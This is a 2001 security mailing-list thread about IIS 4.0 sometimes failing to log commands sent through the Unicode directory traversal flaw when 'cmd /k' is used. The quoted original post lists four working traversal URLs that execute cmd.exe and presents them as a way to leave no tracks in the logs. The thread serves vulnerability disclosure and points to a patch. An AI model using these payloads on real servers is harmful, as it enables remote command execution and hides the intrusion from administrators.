RE: sometimes IIS 4.0 don't write logs.

[ThEye <theye () 350cc com>]

Pablo Aravena said:
> The problem looks like this:
>
>         CMD /K [command]  Execute a command and "still active"
>         CMD /C [command]  Execute a command and then finished.
>
>         If you execute a cmd.exe?/k request this would be in active state
>         until his finished this process instead of the cmd.exe?/c request
>         that finishes the process inmediatly.  Because of this the IIS
> that´s
>         not log the process that has not come to an end.

That's right but if an attacker sends a remote request to "cmd /k" no 
process "cmd" will appear in the webserver's list of processes so this is a 
unusual behavior because if an local user of the NT box calls "cmd /k" 
locally that process will appear in the list of processes. In addition, if 
the attacker calls remotely "cmd /k" his browser will seem waiting for 
webserver's answer ( that happens because CMD is still running due to the 
"K" option ) so if he stops the browser ( pressing ESC ) he will stop the 
"cmd /k" remote process but IIS don't log it.

Roberto Alamos M. (theye () 350cc com)
www.350cc.com


> > -----Mensaje original-----
> > De:   ThEye [SMTP:theye () 350cc com]
> > Enviado el:   jueves, 20 de diciembre de 2001 0:39
> > Para: vuln-dev () securityfocus com
> > CC:   ndr113 () 350cc com
> > Asunto:       sometimes IIS 4.0 don't write logs.
> >
> > <Hi:
> >
> > I don't know if this problem is documented but i didn't find anything
> > about
> > it anywhere.
> >
> > The problem is the following one:
> >
> > + Problem:
> > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
> > Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the
> > attacker
> > uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c)
> > ,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability)
> > sometimes don't write logs of the attacker's activity.
> >
> > + Implications:
> > If an attacker uses this vulnerability to crack a web page or anything,
> > eventually no tracks will exist on the attacked server.
> >
> > + Final:
> > In PROBLEM I said "sometimes" because after a high number of requests to
> > "cmd /k" , IIS 4.0 write logs of some requests, still I don't know when
> > and
> > why IIS 4.0 write logs of the "cmd /k" request.
> > Anyone that can confirm or refute this please post it.
> >
> >
> > + Exploit:
> > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
> >
> > ( without any patch ).
> >
> > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
> > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
> > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
> >
> > Result: No tracks on log files.
> >
> > + More Information:
> > 1) Microsoft IIS and PWS Extended Unicode Directory Transversal
> >
> > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
> > 2) Microsoft Patch prmcan4i
> >
> > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U
> > S/prmcan4i.exe
> >
> > Roberto Alamos M. (theye () 350cc com)
> > www.350cc.com